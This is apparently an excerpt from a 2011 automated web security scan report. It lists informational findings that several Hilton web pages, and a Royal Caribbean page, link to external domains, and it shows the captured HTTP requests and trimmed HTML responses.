Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Abeforeyouboard%25253Ahome%25253Abeforeyouboard%2526pidt%253D1%2526oid%253D%25250A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250A%252509%252509%252509%252509%252509%252509%252509%252509%252509%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 76110
Date: Mon, 03 Oct 2011 12:42:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


           <!--BEGIN MASTER H
...[SNIP]...
<li class="face"><a target="_blank" href="http://www.facebook.com/royalcaribbean" class="socialIcn"><img border="0" alt="Facebook" name="related_topic~~1~~icon_image" src="img/social_media_icons/facebook-sub.gif"></a>
<iframe frameborder="0" scrolling="no" allowtransparency="true" style="border:none; overflow:hidden; width:85px; height:21px;" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&amp;send=false&amp;layout=button_count&amp;width=85&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21"></iframe></li>
<li><a target="_blank" href="http://www.twitter.com/royalcaribbean" class="socialIcn"><img border="0" alt="Twitter" name="related_topic~~2~~icon_image" src="img/social_media_icons/twitter-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.youtube.com/royalcaribbeanintl" class="socialIcn"><img border="0" alt="YouTube" name="related_topic~~3~~icon_image" src="img/social_media_icons/youtube-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.nationofwhynot.com/blog/" class="socialIcn"><img border="0" alt="President's Blog" name="related_topic~~4~~icon_image" src="img/social_media_icons/blog-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://www.flickr.com/photos/royalcaribbeanintl" class="socialIcn"><img border="0" alt="Flickr" name="related_topic~~5~~icon_image" src="img/social_media_icons/flickr-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://feeds2.feedburner.com/WhyNotRecentPosts" class="socialIcn"><img border="0" alt="RSS News Feed " name="related_topic~~6~~icon_image" src="img/social_media_icons/rss-sub.gif">
...[SNIP]...
<li><a target="_blank" href="http://itunes.apple.com/us/app/royal-caribbean-international/id402771489?mt=8&amp;uo=4" class="socialIcn"><img border="0" alt="iPhone App" name="related_topic~~7~~icon_image" src="img/social_media_icons/mobile-sub.gif">
...[SNIP]...
17.52. http://www1.hilton.com/common/js/pushToTalk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /common/js/pushToTalk.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /common/js/pushToTalk.js?ver=rel-r1 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/site-usage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:52 GMT
ETag: "594b-cf65e800"
Accept-Ranges: bytes
Content-Length: 22859
Content-Type: application/x-javascript
Cache-Control: max-age=17808
Expires: Mon, 03 Oct 2011 17:55:00 GMT
Date: Mon, 03 Oct 2011 12:58:12 GMT
Connection: close

// *******************************
// *** Push To Talk by eStara ***
// *******************************

var brandBtn = "";
var pushToTalkImage = "";


function setPushToTalkButton( button ) {
   brandB
...[SNIP]...
</A>';
       
       drawbutton6(country);
   }
   
   
           }


function drawbutton(country)
{
   d = new Date();
   
   if (isopen(d,timezone,country))
   {
       document.write('<script language="JavaScript" src="http://as00.estara.com/as/InitiateCall2.jsp?accountid=20010320"><\/script>
...[SNIP]...
17.53. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64 HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637037222:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:16:56 GMT
Content-Length: 35005
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:27:56 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.54. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=6134AD4FCABA66CF1C1924679BB50856.etc33; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:10 GMT;path=/
Content-Length: 49172


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.55. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do?cid=OH,HH,boslh,DirectionsF HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:27 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
</script>        
           
       
                   <script charset="UTF-8" type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3&mkt=en_US-EN_US">
</script>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Hotel Factsheet
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Folleto del hotel
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Bulletin d'informations
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                           Catering eMenu
                       </a>
...[SNIP]...
<div id="rightNavMarketing.staticImage" >

        <a href="http://www.teamusa.org" rel="nofollow"><img name="USOC Logo" src="/common/media/images/logos/usoc.gif" alt="USOC Logo" align="center" border="0" width="135" height="80" />
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.56. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 84966
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:53:39 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:04:39 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<li>


<a href="http://hiltonplus.flexrez.com/vacations/lang/en-us/featuredHotel.asp?FT=Y&DEST=Y&plf=HLTN&HID=39527&DID=3000008602&DNAME=Boston&DAC=BOS&refid=pahilton&cid=OH,HH,boslh,AirHotelCarF" title="" target="_blank" class="">Air+Hotel+Car</a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Hotel Factsheet
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Folleto del hotel
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Bulletin d'informations
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                           Catering eMenu
                       </a>
...[SNIP]...
<li>
       
       
        <a href="http://www.hhonors.com/Dream" title="" target="_blank" class=""><img src="http://www.hilton.com/repositories/marketingmessages/images/HH_CDWU_145x145pBannernew2.jpg" alt="" border="0" />
...[SNIP]...
<div id="rightNavMarketing.staticImage" >

        <a href="http://www.teamusa.org" rel="nofollow"><img name="USOC Logo" src="/common/media/images/logos/usoc.gif" alt="USOC Logo" align="center" border="0" width="135" height="80" />
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/development/index.htm">
                                                       Franchise Development
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonglobalmediacenter.com/">
                                                       Press &amp; Media
                                                   </a>
...[SNIP]...
<li><a href="http://www.hilton.de/SiteHomePage">Germany</a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://statse.webtrendslive.com/dcsserqb8erp17368wkcsn8pc_2z2f/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</NOSCRIPT>
...[SNIP]...
17.57. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:14 GMT
Content-Length: 84997
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=E417BA0D4FB61B6C8AB561D3C9970187.etc13; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:14 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<li>


<a href="http://hiltonplus.flexrez.com/vacations/lang/en-us/featuredHotel.asp?FT=Y&DEST=Y&plf=HLTN&HID=39527&DID=3000008602&DNAME=Boston&DAC=BOS&refid=pahilton&cid=OH,HH,boslh,AirHotelCarF" title="" target="_blank" class="">Air+Hotel+Car</a>
...[SNIP]...
<li>


<a href="http://bostonloganair.hiltonemenus.com/home.asp?cid=OH,HH,boslh,MenuF" title="" target="_blank" class="">Catering eMenu</a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/us/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Hotel Factsheet
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/es/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Folleto del hotel
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://hilton.ebrochures.org/fr/hi/factsheets/BOSLH_full.pdf" target="factSheet">
                           Bulletin d'informations
                       </a>
...[SNIP]...
<div class="hotelBox">
                   <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                       <img src="/common/media/images/icons/icon_factsheet.gif" alt="" />
...[SNIP]...
<div class="rightNavLink">
                       <a href="http://bostonloganair.hiltonemenus.com/home.asp" target="factSheet">
                           Catering eMenu
                       </a>
...[SNIP]...
<li>
       
       
        <a href="https://www.hiltonhhonors.com/PYO/Q42011/DoublePointsFreeNightCertificates.aspx?lang=EN&cid=OM,HH,11Q04,PropertyBanner" title="" target="_blank" class=""><img src="http://www.hilton.com/repositories/marketingmessages/images/Hotel_Property_145x145.jpg" alt="" border="0" />
...[SNIP]...
<div id="rightNavMarketing.staticImage" >

        <a href="http://www.teamusa.org" rel="nofollow"><img name="USOC Logo" src="/common/media/images/logos/usoc.gif" alt="USOC Logo" align="center" border="0" width="135" height="80" />
...[SNIP]...
<li class="brandBarLi brandBarLi_WA" id="brandBarLi_WA"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_WA');" onmouseout="turnOffPopup('brandBarLi_WA');" href="http://www.waldorfastoria.com"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HV" id="brandBarLi_HV"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HV');" onmouseout="turnOffPopup('brandBarLi_HV');" href="http://www.hiltongrandvacations.com/index.php"><span>
...[SNIP]...
<li>
                                                   
                                                   <a href="http://assistive.usablenet.com/tt/referrer">
                                                       View Text Only
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com">
                                                       Hilton Worldwide
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="http://www.hiltonworldwide.com/careers/index.htm">
                                                       Careers
                                                   </a>
...[SNIP]...
<li>
                                                   
                                                   
